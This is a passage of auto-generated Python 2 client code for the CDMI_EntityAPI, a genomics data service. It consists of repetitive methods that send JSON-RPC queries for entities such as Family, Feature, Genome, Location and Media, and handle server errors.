raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ExperimentalUnit(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ExperimentalUnit',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ExperimentalUnitGroup(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ExperimentalUnitGroup',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ExperimentalUnitGroup(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ExperimentalUnitGroup',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ExperimentalUnitGroup(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ExperimentalUnitGroup',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Family(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Family',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Family(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Family',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Family(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Family',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Feature(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Feature',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Feature(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Feature',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Feature(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Feature',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Genome(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Genome',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Genome(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Genome',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Genome(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Genome',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Locality(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Locality',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Locality(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Locality',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Locality(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Locality',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_LocalizedCompound(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_LocalizedCompound',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_LocalizedCompound(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_LocalizedCompound',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_LocalizedCompound(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_LocalizedCompound',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Location(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Location',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Location(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Location',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Location(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Location',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_LocationInstance(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_LocationInstance',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_LocationInstance(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_LocationInstance',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_LocationInstance(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_LocationInstance',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Measurement(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Measurement',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Measurement(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Measurement',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Measurement(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Measurement',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_MeasurementDescription(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_MeasurementDescription',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_MeasurementDescription(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_MeasurementDescription',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_MeasurementDescription(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_MeasurementDescription',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Media(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Media',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Media(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Media',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Media(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Media',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Model(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Model',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Model(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Model',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
